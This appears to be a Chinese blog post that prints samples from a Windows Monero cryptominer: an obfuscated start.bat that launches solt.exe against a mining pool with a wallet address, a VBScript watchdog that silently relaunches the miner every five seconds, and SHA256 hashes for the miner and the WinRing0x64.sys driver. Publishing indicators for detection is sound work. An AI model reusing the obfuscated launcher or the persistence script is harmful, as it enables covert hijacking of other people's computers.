345.jpg

start.bat

s%xwx%o%zqpffkfram%l%fzqiif%t%mol%.%suileedkl%e%mimfbxdpgs%x%ugocbqaggqrqn%e%jvcitnymqe% %fzmckrnnso%-%vkwvhbwdp%-%vqzrzpdtpmiobu%c%dmflngqr%o%cjcyf%i%dsjhftwhy%n%ydeikllfegcjl%=%embfps%X%wdfiwaapkyz%M%dwnvagkxm%R%qunr% %peuabhjqh%-%xqulpmr%-%leemvlhsxlbjco%u%veotsb%r%orkdgipe%l%dwrayuhooqsiig%=%xnqxuzccuu%x%fsebvrkgqe%m%sbqmufgqnos%r%srexjrotxzdr%.%cgdpihyl%2%salgwr%m%tbpm%i%xnud%n%idopgbxjuixfzq%e%nvwcwwx%r%bjgdd%s%qaq%.%zkljnx%c%fzmckrnnsovffr%o%mrpjqkbetrrhx%m%bpkzuit%:%ollnmiffmka%2%nywktwpbpjm%2%yejoizhwfab%2%qvrwmulb%2%wucehnczxy% %dwnv%-%gismkdtjaq%-%qrjdut%u%klqtjzgpapsqzu%s%gfteodb%e%hwhodpjnyrcb%r%efteasq%=%qojvxt%4%hck%B%agd%r%aaaudjh%L%dqjzitehmhau%5%sbqm%1%ilrtvowzhhpapg%J%phctthuxxkfqcb%C%jckk%c%zmlrkxrbmhwnf%9%vkrpk%N%ovswz%G%nvwcwwxbcyolc%Q%pbvsehr%7%nfemjw%1%yafa%k%bnkrxibrfp%W%vqzrzp%h%fqiywepx%n%dmflngqryc%Y%pngpl%o%igsdb%D%cavoshvecv%R%vhshno%f%gdtvrdjkcv%f%ifo%s%udkogc%D%pfdlwhcy%Z%edu%y%qrjdutau%7%xqulpmrsiznkr%m%ggx%1%koqbgzypn%H%mopbtkjfhht%U%ricthsforsigm%U%xnqxuzccuurqpz%7%vgncpb%M%sbqmufgqnoszp%R%bwsbk%U%phctt%4%cgd%n%nihzekgyfxbtnz%U%yabup%M%idopgbxjuixfz%X%ejbxssbak%A%uuhkspna%H%btssnieyhz%N%yafanl%F%orojevmunzuxg%B%gcpqtqmt%E%wagazaipxo%J%mmqtwkrfux%h%zqtlcxbibhqbak%k%fnfl%T%nzaqr%Z%wuc%V%uudfucrj%9%jzkcmojtgdbl%H%peuabhjqhllc%d%lvxcjlmlirl%a%opobhvuvaowxz%L%orkdgipel%4%ricthsforsigmp%g%aaaudjhfjij%f%cdzcnukuqakwlz%u%bton%N%rhxojfjxpxk%B%qyre%x%tkwvuqln%L%rgtils%P%pezgzughjfjw%c%hwlubcgdalav%3%agi%B%bjgddv%e%pbvsehrrv%M%wgjwrn%k%kjrlmzopofuqsl%L%vtzzwovscwg%G%wagazaipxobs%a%tnaj%P%igsdboma%b%yej%F%jwgorauds%5%embfpstaw%v%ouorbveuzjsy%W%gismk%t%qunr%A%peuabhj%N%klqtjzgpa%Q%leemvlhsxlbj%o%hwhodpjny%t%ueoueqigt%U%azwo%X%rkxwgfbw%h%xnqxuz%z%ygiwfyzvs%D%fti%2%uylymccqt%y%oihzrvroyfejx%e%urdwxcz%5%gpanadwqczgx%R%pezgzugh%L%mimfbxdpgszn%p%nvwcwwxbcy%v%uxhsppfzrwb%B%fzmckrnnsovff%S%nceemwaie% %axwgiwtovdn%-%dmflngqryc%-%pngplvbnxzzklh%p%gma%a%ftmmqrdottz%s%lbayaysbjgfpbs%s%dwnvagkxmw%=%wdjoun%x%hzlcycydmvyvo%

solt.vbs

set service = GetObject ("winmgmts:")

for each Process in Service.InstancesOf ("Win32_Process")
       If Process.Name = "solt.exe" Then

Set WshShell=WScript.CreateObject("WScript.Shell")
    WScript.Quit
End If
next


On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
do
WScript.Sleep 5000
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "solt.exe" Then
Running = True
Exit For
End If
Next
IF Not Running Then
WshShell.Run ("start.bat"), 0
End if
Loop


SHA256

名称: solt.exe
大小: 7191040 字节 (7022 KiB)
SHA256: D6065284A545392AE4FFB46DAA5BEBC9553CF0F4FE123DAF253B390F42494037


名称: WinRing0x64.sys
大小: 14544 字节 (14 KiB)
SHA256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Captcha Code